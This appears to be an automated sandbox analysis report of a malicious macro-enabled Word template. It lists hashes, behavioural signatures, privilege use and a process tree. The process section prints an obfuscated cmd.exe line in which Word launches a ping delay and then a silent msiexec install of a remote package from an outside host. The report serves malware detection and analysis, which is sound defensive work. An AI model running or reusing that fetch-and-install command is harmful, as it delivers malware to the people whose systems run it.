Analysis
- max time kernel: 147s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20240319-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240319-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10/04/2024, 10:16
Behavioral task behavioral1
- Sample: 33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
- Resource: win7-20240221-en
Behavioral task behavioral2
- Sample: 33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
- Resource: win10v2004-20240319-en
General
- Target: 33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
- Size: 67KB
- MD5: 549334edbfacd98b6c5c3154949d5b12
- SHA1: a17eef04cf987d16ab2f7c23f97885e6e428f500
- SHA256: 33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548
- SHA512: eac1d31ec581fa694c38ecd0109e2b5ff3510bd26e45b2939b4cdb3f1d75e3b74516b4004db9a774df4739c4476262f4db92ba76768cb46fa2e8da32ffe537db
- SSDEEP: 1536:ruTk2YSjvnD9AxoD+u9yqYjc5zZP80/qv13oteePEl+p0X+p7RFVBaIA:K9KxQH9T5FLiv13ZAnp3GIA
Malware Config
Signatures
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3564 | 4928 | cmd.exe | 88
- Use of msiexec (install) with remote resource (1 IoCs)
  pid | Process
  6020 | msiexec.exe
- Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  135 | 6056 | msiexec.exe
- Drops file in Windows directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\Installer\MSI640F.tmp | msiexec.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process
  1356 | PING.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  pid | Process
  4928 | WINWORD.EXE
  4928 | WINWORD.EXE
- Suspicious use of AdjustPrivilegeToken (34 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 6020 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 6020 | msiexec.exe
  Token: SeSecurityPrivilege | 6056 | msiexec.exe
  Token: SeCreateTokenPrivilege | 6020 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 6020 | msiexec.exe
  Token: SeLockMemoryPrivilege | 6020 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 6020 | msiexec.exe
  Token: SeMachineAccountPrivilege | 6020 | msiexec.exe
  Token: SeTcbPrivilege | 6020 | msiexec.exe
  Token: SeSecurityPrivilege | 6020 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 6020 | msiexec.exe
  Token: SeLoadDriverPrivilege | 6020 | msiexec.exe
  Token: SeSystemProfilePrivilege | 6020 | msiexec.exe
  Token: SeSystemtimePrivilege | 6020 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 6020 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 6020 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 6020 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 6020 | msiexec.exe
  Token: SeBackupPrivilege | 6020 | msiexec.exe
  Token: SeRestorePrivilege | 6020 | msiexec.exe
  Token: SeShutdownPrivilege | 6020 | msiexec.exe
  Token: SeDebugPrivilege | 6020 | msiexec.exe
  Token: SeAuditPrivilege | 6020 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 6020 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 6020 | msiexec.exe
  Token: SeRemoteShutdownPrivilege | 6020 | msiexec.exe
  Token: SeUndockPrivilege | 6020 | msiexec.exe
  Token: SeSyncAgentPrivilege | 6020 | msiexec.exe
  Token: SeEnableDelegationPrivilege | 6020 | msiexec.exe
  Token: SeManageVolumePrivilege | 6020 | msiexec.exe
  Token: SeImpersonatePrivilege | 6020 | msiexec.exe
  Token: SeCreateGlobalPrivilege | 6020 | msiexec.exe
  Token: SeRestorePrivilege | 6056 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 6056 | msiexec.exe
- Suspicious use of SetWindowsHookEx (11 IoCs)
  pid | Process
  4928 | WINWORD.EXE (11 identical entries)
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 4928 wrote to memory of 3564 | 4928 | WINWORD.EXE | 103
  PID 4928 wrote to memory of 3564 | 4928 | WINWORD.EXE | 103
  PID 3564 wrote to memory of 1356 | 3564 | cmd.exe | 105
  PID 3564 wrote to memory of 1356 | 3564 | cmd.exe | 105
  PID 3564 wrote to memory of 6020 | 3564 | cmd.exe | 114
  PID 3564 wrote to memory of 6020 | 3564 | cmd.exe | 114
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Uses Volume Shadow Copy WMI provider
  The Volume Shadow Copy service is used to manage backups/snapshots.
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm" /o ""
  PID: 4928
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C P^i^Ng 127.0.0.1 -n 66 > NUL && M^S^Ie^x^e^c /i http://2215.site/cdt4821.msi /qn
    PID: 3564
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE
      Command line: PiNg 127.0.0.1 -n 66
      PID: 1356
      - Runs ping.exe
    - C:\Windows\system32\msiexec.exe
      Command line: MSIexec /i http://2215.site/cdt4821.msi /qn
      PID: 6020
      - Use of msiexec (install) with remote resource
      - Suspicious use of AdjustPrivilegeToken
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4956 --field-trial-handle=3408,i,16599691418790971742,134777455365707676,262144 --variations-seed-version /prefetch:8
  PID: 3732
- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 6056
  - Blocklisted process makes network request
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 262KB
  MD5: 51d32ee5bc7ab811041f799652d26e04
  SHA1: 412193006aa3ef19e0a57e16acf86b830993024a
  SHA256: 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
  SHA512: 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
- Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84